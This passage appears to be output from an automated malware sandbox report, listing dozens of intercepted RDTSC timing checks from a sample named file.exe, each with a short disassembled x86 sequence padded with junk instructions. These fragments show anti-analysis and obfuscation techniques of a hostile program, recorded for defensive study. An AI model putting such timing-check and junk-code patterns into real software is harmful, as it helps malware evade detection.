0x00000071 pop eax 0x00000072 ret 0x00000073 nop 0x00000074 push eax 0x00000075 push edx 0x00000076 jne 00007F0E647B6085h 0x0000007c rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A868E1 second address: A868FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E6551CA3Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b je 00007F0E6551CA3Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A868FC second address: A86904 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8A7E8 second address: A8A84A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a mov edi, dword ptr [ebp+122D2B98h] 0x00000010 push dword ptr fs:[00000000h] 0x00000017 mov edi, dword ptr [ebp+12460A65h] 0x0000001d mov dword ptr fs:[00000000h], esp 0x00000024 sub dword ptr [ebp+122D59E8h], edi 0x0000002a mov dword ptr [ebp+122D2026h], esi 0x00000030 mov eax, dword ptr [ebp+122D16C5h] 0x00000036 mov bl, 19h 0x00000038 jmp 00007F0E6551CA45h 0x0000003d push FFFFFFFFh 0x0000003f movsx edi, si 0x00000042 push eax 0x00000043 pushad 0x00000044 pushad 0x00000045 push edi 0x00000046 pop edi 0x00000047 jl 00007F0E6551CA36h 0x0000004d popad 0x0000004e push eax 0x0000004f push edx 0x00000050 push eax 0x00000051 push edx 0x00000052 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8A84A second address: A8A84E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8C7A0 second address: A8C848 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E6551CA45h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F0E6551CA45h 0x0000000e popad 0x0000000f nop 0x00000010 mov di, 8F9Ah 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push esi 0x00000019 call 00007F0E6551CA38h 0x0000001e pop esi 0x0000001f mov dword ptr [esp+04h], esi 0x00000023 add dword ptr [esp+04h], 00000014h 0x0000002b inc esi 0x0000002c push esi 0x0000002d ret 0x0000002e pop esi 0x0000002f ret 0x00000030 push 00000000h 0x00000032 call 00007F0E6551CA3Ah 0x00000037 jmp 00007F0E6551CA49h 0x0000003c pop edi 0x0000003d xchg eax, esi 0x0000003e pushad 0x0000003f push ebx 0x00000040 jmp 00007F0E6551CA45h 0x00000045 pop ebx 0x00000046 jmp 00007F0E6551CA40h 0x0000004b popad 0x0000004c push eax 0x0000004d push eax 0x0000004e push edx 0x0000004f push ebx 0x00000050 push eax 0x00000051 push edx 0x00000052 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8C848 second address: A8C84D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8B96D second address: A8B972 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8B972 second address: A8BA27 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E647B6086h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edi 0x0000000b jmp 00007F0E647B6088h 0x00000010 pop edi 0x00000011 nop 0x00000012 pushad 0x00000013 sub dword ptr [ebp+122D2343h], eax 0x00000019 jp 00007F0E647B6076h 0x0000001f popad 0x00000020 push dword ptr fs:[00000000h] 0x00000027 jmp 00007F0E647B6088h 0x0000002c mov dword ptr fs:[00000000h], esp 0x00000033 mov bl, 36h 0x00000035 mov eax, dword ptr [ebp+122D032Dh] 0x0000003b push 00000000h 0x0000003d push eax 0x0000003e call 00007F0E647B6078h 0x00000043 pop eax 0x00000044 mov dword ptr [esp+04h], eax 0x00000048 add dword ptr [esp+04h], 0000001Ah 0x00000050 inc eax 0x00000051 push eax 0x00000052 ret 0x00000053 pop eax 0x00000054 ret 0x00000055 push FFFFFFFFh 0x00000057 mov di, ax 0x0000005a mov bx, si 0x0000005d nop 0x0000005e jl 00007F0E647B607Ah 0x00000064 push ecx 0x00000065 push ecx 0x00000066 pop ecx 0x00000067 pop ecx 0x00000068 push eax 0x00000069 push eax 0x0000006a push edx 0x0000006b jmp 00007F0E647B607Bh 0x00000070 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A94966 second address: A9496B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9496B second address: A949BB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E647B6085h 0x00000007 jmp 00007F0E647B6084h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ecx 0x0000000f jne 00007F0E647B6081h 0x00000015 pushad 0x00000016 jmp 00007F0E647B607Eh 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A941ED second address: A94211 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F0E6551CA45h 0x0000000e jnc 00007F0E6551CA36h 0x00000014 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A94211 second address: A9421B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9421B second address: A94221 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A94221 second address: A94225 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A94225 second address: A94229 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A94229 second address: A94234 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A94234 second address: A9423C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9423C second address: A94255 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F0E647B6080h 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A94255 second address: A9426C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E6551CA43h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A943A8 second address: A943AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A36862 second address: A36866 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A36866 second address: A3686A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9B5DD second address: A9B5EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 push ecx 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9B5EA second address: A9B602 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop ecx 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jno 00007F0E647B607Ch 0x00000012 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9B602 second address: A9B60C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F0E6551CA36h 0x0000000a rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9B60C second address: A9B610 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9B6A3 second address: A9B6ED instructions: 0x00000000 rdtsc 0x00000002 jl 00007F0E6551CA36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c jbe 00007F0E6551CA3Eh 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 push ecx 0x00000017 jmp 00007F0E6551CA43h 0x0000001c pop ecx 0x0000001d mov eax, dword ptr [eax] 0x0000001f pushad 0x00000020 push ebx 0x00000021 pushad 0x00000022 popad 0x00000023 pop ebx 0x00000024 pushad 0x00000025 pushad 0x00000026 popad 0x00000027 push edi 0x00000028 pop edi 0x00000029 popad 0x0000002a popad 0x0000002b mov dword ptr [esp+04h], eax 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9B6ED second address: A9B70B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0E647B6089h 0x00000009 popad 0x0000000a rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9B81B second address: A9B847 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0E6551CA42h 0x00000008 js 00007F0E6551CA36h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 jng 00007F0E6551CA48h 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9B847 second address: A9B84B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9B84B second address: A9B878 instructions: 0x00000000 rdtsc 0x00000002 je 00007F0E6551CA36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c push edx 0x0000000d jmp 00007F0E6551CA47h 0x00000012 pop edx 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 push edi 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9B878 second address: 8BEE0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edi 0x00000006 pop eax 0x00000007 js 00007F0E647B608Eh 0x0000000d jmp 00007F0E647B6088h 0x00000012 push dword ptr [ebp+122D0361h] 0x00000018 stc 0x00000019 cmc 0x0000001a call dword ptr [ebp+122D2034h] 0x00000020 pushad 0x00000021 jmp 00007F0E647B6086h 0x00000026 mov dword ptr [ebp+122D2273h], edx 0x0000002c xor eax, eax 0x0000002e jmp 00007F0E647B6083h 0x00000033 mov dword ptr [ebp+122D2273h], edx 0x00000039 mov edx, dword ptr [esp+28h] 0x0000003d jmp 00007F0E647B607Eh 0x00000042 mov dword ptr [ebp+122D2D98h], eax 0x00000048 jmp 00007F0E647B6088h 0x0000004d mov esi, 0000003Ch 0x00000052 clc 0x00000053 cld 0x00000054 add esi, dword ptr [esp+24h] 0x00000058 jmp 00007F0E647B6086h 0x0000005d lodsw 0x0000005f jp 00007F0E647B607Ch 0x00000065 add eax, dword ptr [esp+24h] 0x00000069 pushad 0x0000006a mov eax, 3F34A5C6h 0x0000006f mov dx, ECF7h 0x00000073 popad 0x00000074 mov ebx, dword ptr [esp+24h] 0x00000078 stc 0x00000079 nop 0x0000007a pushad 0x0000007b jmp 00007F0E647B6084h 0x00000080 jns 00007F0E647B607Ch 0x00000086 popad 0x00000087 push eax 0x00000088 push eax 0x00000089 push eax 0x0000008a push edx 0x0000008b push ebx 0x0000008c pop ebx 0x0000008d rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9CF44 second address: A9CF48 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A33119 second address: A33123 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F0E647B6076h 0x0000000a rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A34C68 second address: A34C76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F0E6551CA36h 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A34C76 second address: A34C8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F0E647B6084h 0x0000000a rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA1841 second address: AA1852 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push edx 0x00000007 pop edx 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b ja 00007F0E6551CA36h 0x00000011 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA1852 second address: AA1856 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA1E06 second address: AA1E0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA20A0 second address: AA20AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F0E647B6076h 0x0000000a rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA20AA second address: AA20CA instructions: 0x00000000 rdtsc 0x00000002 jno 00007F0E6551CA36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F0E6551CA43h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA20CA second address: AA20D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA2212 second address: AA2218 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA2218 second address: AA221C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA221C second address: AA224F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E6551CA45h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a ja 00007F0E6551CA3Ch 0x00000010 jo 00007F0E6551CA36h 0x00000016 jnc 00007F0E6551CA38h 0x0000001c pushad 0x0000001d push eax 0x0000001e pop eax 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA2524 second address: AA2540 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0E647B6088h 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA2540 second address: AA254F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jp 00007F0E6551CA36h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA26BE second address: AA26C6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA26C6 second address: AA26D0 instructions: 0x00000000 rdtsc 0x00000002 js 00007F0E6551CA3Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A34CA4 second address: A34CB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F0E647B6076h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA8F58 second address: AA8F74 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E6551CA46h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA8F74 second address: AA8F88 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F0E647B607Eh 0x0000000b rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA79C6 second address: AA79CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA79CB second address: AA79DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pushad 0x0000000d popad 0x0000000e pop esi 0x0000000f rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA79DA second address: AA79E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007F0E6551CA36h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA7C89 second address: AA7C95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F0E647B6076h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA7C95 second address: AA7CAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007F0E6551CA3Fh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA7F57 second address: AA7F5C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA830D second address: AA8312 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA88FC second address: AA8917 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F0E647B6082h 0x0000000a popad 0x0000000b push esi 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA768E second address: AA76A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 pop eax 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a jmp 00007F0E6551CA3Ah 0x0000000f popad 0x00000010 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB08B2 second address: AB08BC instructions: 0x00000000 rdtsc 0x00000002 jl 00007F0E647B6076h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAF8A4 second address: AAF8A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAFB96 second address: AAFBA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F0E647B6076h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jg 00007F0E647B6076h 0x00000013 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAFBA9 second address: AAFBCA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E6551CA3Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pushad 0x0000000b jmp 00007F0E6551CA3Ah 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAFBCA second address: AAFBD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAF300 second address: AAF319 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0E6551CA40h 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB002F second address: AB0050 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 ja 00007F0E647B60A0h 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F0E647B6082h 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB0050 second address: AB005A instructions: 0x00000000 rdtsc 0x00000002 jg 00007F0E6551CA36h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB01BD second address: AB01E2 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F0E647B6076h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jnp 00007F0E647B607Ch 0x00000012 jng 00007F0E647B6076h 0x00000018 pop edi 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F0E647B607Ah 0x00000020 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB01E2 second address: AB01EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB0361 second address: AB0367 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB0367 second address: AB0372 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB0613 second address: AB063C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E647B607Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F0E647B6087h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB063C second address: AB0646 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F0E6551CA36h 0x0000000a rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB0646 second address: AB064A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABA76E second address: ABA772 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABA772 second address: ABA778 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABA778 second address: ABA781 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A777B9 second address: A58FE9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jmp 00007F0E647B6085h 0x0000000c pop ebx 0x0000000d popad 0x0000000e mov dword ptr [esp], eax 0x00000011 ja 00007F0E647B607Ch 0x00000017 call dword ptr [ebp+12468A86h] 0x0000001d jmp 00007F0E647B607Eh 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 pop eax 0x00000028 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A77E55 second address: A77E99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop esi 0x00000006 xor dword ptr [esp], 2BA73ED7h 0x0000000d push 00000000h 0x0000000f push edi 0x00000010 call 00007F0E6551CA38h 0x00000015 pop edi 0x00000016 mov dword ptr [esp+04h], edi 0x0000001a add dword ptr [esp+04h], 00000019h 0x00000022 inc edi 0x00000023 push edi 0x00000024 ret 0x00000025 pop edi 0x00000026 ret 0x00000027 mov dword ptr [ebp+12450F58h], edi 0x0000002d and ecx, 161AB867h 0x00000033 push 824C85A1h 0x00000038 push ecx 0x00000039 push eax 0x0000003a push edx 0x0000003b pushad 0x0000003c popad 0x0000003d rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A77F87 second address: A77F96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push eax 0x00000006 push edx 0x00000007 ja 00007F0E647B6078h 0x0000000d rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A77F96 second address: A77F9B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
